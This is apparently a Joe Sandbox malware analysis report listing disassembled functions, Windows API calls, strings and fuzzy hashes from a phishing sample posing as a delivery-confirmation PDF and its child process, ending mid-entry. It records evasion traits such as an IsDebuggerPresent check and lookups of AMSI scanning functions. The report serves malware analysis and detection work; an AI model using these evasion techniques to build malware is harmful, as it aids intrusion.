Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: b73025ae3bcfd1bdd1b99e9c214b7106d9994d236473db95ac2bc8a372786aa2
Instruction ID: 17524aec0ee601cde016c255ec0e990737affbbd61b42a41bf749d2544976cb9
Opcode Fuzzy Hash: b73025ae3bcfd1bdd1b99e9c214b7106d9994d236473db95ac2bc8a372786aa2
Instruction Fuzzy Hash: 694116753049054BC729AB7988803BFB3EBDBC5210F504E25D762D7344E736EE06DA21

Function 02CE8020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

GetModuleHandleA.KERNELBASE(?), ref: 02CE8072

Strings

AeldnaHeludoMteG, xrefs: 02CE8039
KernelBASE, xrefs: 02CE8059

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 8d00d13b451847b0f8f3e01c147248a9bf10615cba41f04979590610ce17a904
Instruction ID: 57b52c9a69c316c24a27ec32bb3f371cab43e7cd271ca4d9cea452028c489b07
Opcode Fuzzy Hash: 8d00d13b451847b0f8f3e01c147248a9bf10615cba41f04979590610ce17a904
Instruction Fuzzy Hash: 81F09075640304AFEF11EFB4DC4295E77ADEB49B00B910A60F606E3B20D730AD10DE64

Function 02CEEB94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02CEEF98,UacInitialize,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,Initialize), ref: 02CEEB9A
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CEEBAC

Strings

KernelBase, xrefs: 02CEEB95
IsDebuggerPresent, xrefs: 02CEEBA6

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 08d947b08f39e7459e0191f99cc36723f5986f611e8363334f808bd97bf46d81
Instruction ID: a2bc5b9b9b1b8e49f1723aa5aac8fef0ea35b9cef5ca89dbd7ce9630ddedc097
Opcode Fuzzy Hash: 08d947b08f39e7459e0191f99cc36723f5986f611e8363334f808bd97bf46d81
Instruction Fuzzy Hash: 6BD08CA67697101EFE0036F42CC4C1E02CD89455BE3340FB1F223D60D2E7BAC913A518

Function 02CDC3FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02CFC10B,00000000,02CFC11E), ref: 02CDC402
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02CDC413

Strings

GetDiskFreeSpaceExA, xrefs: 02CDC40D
kernel32.dll, xrefs: 02CDC3FD

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 5abf23f6167182fad5c1a93d0434103b398cf94d307ded93e9ea36afc0ab7b4b
Instruction ID: 787ca8e3a90725154ad61ce7201d2b88f852870a97b3f02cd2109a9752144c98
Opcode Fuzzy Hash: 5abf23f6167182fad5c1a93d0434103b398cf94d307ded93e9ea36afc0ab7b4b
Instruction Fuzzy Hash: 90D05EA0A803014FE3005AB1E88073A368C8B48706B50593BE30345102C7B15614DFC4

Function 02CDE170 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02CDE21F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02CDE23B
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02CDE2B2
VariantClear.OLEAUT32(?), ref: 02CDE2DB

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: ba2e725c8fd9a3df3baab89c48e3017dfc50bb9fa7fbd4036c8017693ffbc04f
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 4C410B76A0061D9FCB61EB58CC90BD9B3BDAF48314F0041D5E649AB252DA30AF809F50

Function 02CDACC4 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CDACE1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CDAD05
GetModuleFileNameA.KERNEL32(02CD0000,?,00000105), ref: 02CDAD20
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CDADB6

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 35de8ce4d90a94b08cab8f503c0fe1cfcd9db000bcb22a524e8b25f4a6a1d1ec
Instruction ID: 8283c39363104a994953a0e82ad9496399c84448969d43405ac65698c9463a3d
Opcode Fuzzy Hash: 35de8ce4d90a94b08cab8f503c0fe1cfcd9db000bcb22a524e8b25f4a6a1d1ec
Instruction Fuzzy Hash: BD412771A402589BDB21EB68CC84BDAB7FDAB18301F0044EAE648E7241DB759F88DF50

Function 02CDACC2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CDACE1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CDAD05
GetModuleFileNameA.KERNEL32(02CD0000,?,00000105), ref: 02CDAD20
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CDADB6

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 37c1232fa1feb1cf230d82e75830e497d751984c688b58584791b53fccdd2df6
Instruction ID: 391727157fe1969ccc88cf4287b2eb9c2eb5f91d5c90061955e3ec3ee64b33ec
Opcode Fuzzy Hash: 37c1232fa1feb1cf230d82e75830e497d751984c688b58584791b53fccdd2df6
Instruction Fuzzy Hash: AB414971A402589FDB21EB68CC84BDAB7FDAB08301F0044EAE648E7241DB759F88DF50

Function 02CD1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa9f7604cd7caede2bf837044b3959eb66a61694ab75742738de00ceb2add43
Instruction ID: 1b90481f8bcfb5a4a827972d3b192e2f0941a3f6595de131ec649519f224db0c
Opcode Fuzzy Hash: daa9f7604cd7caede2bf837044b3959eb66a61694ab75742738de00ceb2add43
Instruction Fuzzy Hash: 13A1E6767106000BE719AA7C9D843BEB3C2DBC4225F1D427EE31DCB381EBE5DA469650

Function 02CD9474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02CD9562), ref: 02CD94FA
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02CD9562), ref: 02CD9500

Strings

yyyy, xrefs: 02CD94D5

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 8541559141144519e607ff232b272905dff29e33ff04ae690b69b0e39dc8d836
Instruction ID: bcc6cd255990eb144aec0407d177b88479653b76ad13b16f33c5954b7ebb7d76
Opcode Fuzzy Hash: 8541559141144519e607ff232b272905dff29e33ff04ae690b69b0e39dc8d836
Instruction Fuzzy Hash: 53216079A002189FDB25EF94C881AAEB3B9EF48710F5140A5EB05E7250E630DF40DF65

Function 02CE818C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CE8216), ref: 02CE81F8

Strings

FlushInstructionCache, xrefs: 02CE81A5
Kernel32, xrefs: 02CE81D7

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: 31dca644c3f90dd936dff865284f104d2059c9385ba8783eb9d73e73032d379d
Instruction ID: 53f5318aa1e2c0e2d5bcaacd40b03584be7c379fd03055f1143e5f6e01f53f1a
Opcode Fuzzy Hash: 31dca644c3f90dd936dff865284f104d2059c9385ba8783eb9d73e73032d379d
Instruction Fuzzy Hash: 9A016975640304AFEB25EFA4DC42F5E77ADEB48B00F614570B609E7A50DA74ED109F24

Function 02CEAD64 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02CEAD98
IsBadWritePtr.KERNEL32(?,00000004), ref: 02CEADC8
IsBadReadPtr.KERNEL32(?,00000008), ref: 02CEADE7
IsBadReadPtr.KERNEL32(?,00000004), ref: 02CEADF3

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
Instruction ID: 2b52897d6587d46c860bb51775b6f3bfec5cf9ecc6a708306f064505a4fd4603
Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
Instruction Fuzzy Hash: 8C219A75A402199FDF10DF55DC80B9EB7B9FF84356F104111EE5197340DB34DA11E6A4

Analysis Process: xnxcxbpC.pifPID: 6568, Parent PID: 6620COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	5.3%
Signature Coverage:	0%
Total number of Nodes:	133
Total number of Limit Nodes:	14

Executed Functions

Function 00401560 Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 561COMMON

Download Yara Rule

Strings

@, xrefs: 004017D8
gfff, xrefs: 004015A1
a```, xrefs: 00401BB0
gfff, xrefs: 00401A57
gfff, xrefs: 00401801
gfff, xrefs: 00401725
B, xrefs: 004018FD

Memory Dump Source

Source File: 00000005.00000001.2240612086.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: @$B$a```$gfff$gfff$gfff$gfff
API String ID: 0-3667867154
Opcode ID: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
Instruction ID: 4d4c1e64281832a49f187a404ecdf2e47e159528420c40e4fc39f5ea6f09713e
Opcode Fuzzy Hash: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
Instruction Fuzzy Hash: 3C021771F0011947DB2C9959CC95BFE726AE794304F5881BBEA0AEF3E1E6389F448B44

Function 00417B33 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5

Memory Dump Source

Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
Instruction ID: 331d18eb78583633b9e29c6af9a4f26b0dc20ce173b82e1c0a0b08c061dba126
Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
Instruction Fuzzy Hash: 780112B5E4410DA7DB10DAA5DC42FDEB3789F54708F0041A6E90897240F635EB588795

Function 0042CB13 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB4A

Memory Dump Source

Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
Instruction ID: 71597bb0a06a303982d629d451bdfe7f1673587ba4a769b47156b06249900e13
Opcode Fuzzy Hash: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
Instruction Fuzzy Hash: 44E0DF312002003BD220AA2AEC42F9B735CDBC5710F00441AFA09A7141C670790187E4

Function 22AB2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 22AB2B6A

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dd9571ac28c733c7bcbc6ab0b6c2ab2e0785c7c3f45f6a7cea9b37ccab5c56bd
Instruction ID: 3e2a582f566819f0d7dc075396df069414b6438acd4fee06891aad99f2c57742
Opcode Fuzzy Hash: dd9571ac28c733c7bcbc6ab0b6c2ab2e0785c7c3f45f6a7cea9b37ccab5c56bd
Instruction Fuzzy Hash: EA90026120250007410671594454616401A57E0201B96C021E1014590DC52689916125

Function 22AB2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 22AB2C7A

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dcd187a13fb2459bf97011d554ed1d9e6f37f847e0a0eb9209795977ca5ab75a
Instruction ID: 9cbe8ae56b295f2d43ea85737e34c4a4e2d63953deb6592a227a43622d1205d8
Opcode Fuzzy Hash: dcd187a13fb2459bf97011d554ed1d9e6f37f847e0a0eb9209795977ca5ab75a
Instruction Fuzzy Hash: 3D90023120158806D1117159844474A001557D0301F9AC411A4424658D869689917121

Function 22AB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 22AB2DFA

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5b32031464b086be9b95c9891b5efb3fff47fd0469e090bbac7f24a6c3543dd8
Instruction ID: fa6116f961562e45fceff7bdeafc4ecca193b73543c062efa5fbf8f9cd8562f6
Opcode Fuzzy Hash: 5b32031464b086be9b95c9891b5efb3fff47fd0469e090bbac7f24a6c3543dd8
Instruction Fuzzy Hash: 1D90023120150417D11271594544707001957D0241FD6C412A0424558D96578A52A121

Function 22AB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 22AB35CA

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1d2d59ae8a75f3d6999665f555e0e3ceb56948f9ed6f9de08992a810d1c2b431
Instruction ID: 936876fa1c4abbae62a797e467372cd65971d2a340836cf56ac0310a7c9e46c4
Opcode Fuzzy Hash: 1d2d59ae8a75f3d6999665f555e0e3ceb56948f9ed6f9de08992a810d1c2b431
Instruction Fuzzy Hash: 5E90023160560406D10171594554706101557D0201FA6C411A0424568D87968A5165A2

Function 00401AF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EntryPoint.XNXCXBPC(?,0000032C,?), ref: 00401BFF

Strings

a```, xrefs: 00401BB0

Memory Dump Source

Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd

Yara matches

Similarity

API ID: EntryPoint
String ID: a```
API String ID: 3225343992-3259403941
Opcode ID: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
Instruction ID: 9cd544999dd2b03daafdb1c4164150612a4eeb260070e7f16c4efc787f4e75c6
Opcode Fuzzy Hash: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
Instruction Fuzzy Hash: ED31F771F042194BDF1C86288C507AEB666DB94344F4881BBE909AF7E1E6786E448B84

Function 0042CE73 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CEB2

Strings

whA, xrefs: 0042CE76

Memory Dump Source

Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: whA
API String ID: 3298025750-33568622
Opcode ID: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
Instruction ID: df9e10e1718a61ed7688cb98799c3328294b3d2316893391272a51bf3c6f2a62
Opcode Fuzzy Hash: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
Instruction Fuzzy Hash: 5EE06DB26002047BD610EF59EC81EAB33ACEFC5710F40401AFA08A7241C671B910CBF9

Function 00417BB3 Relevance: 1.6, APIs: 1, Instructions: 105
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5

Memory Dump Source

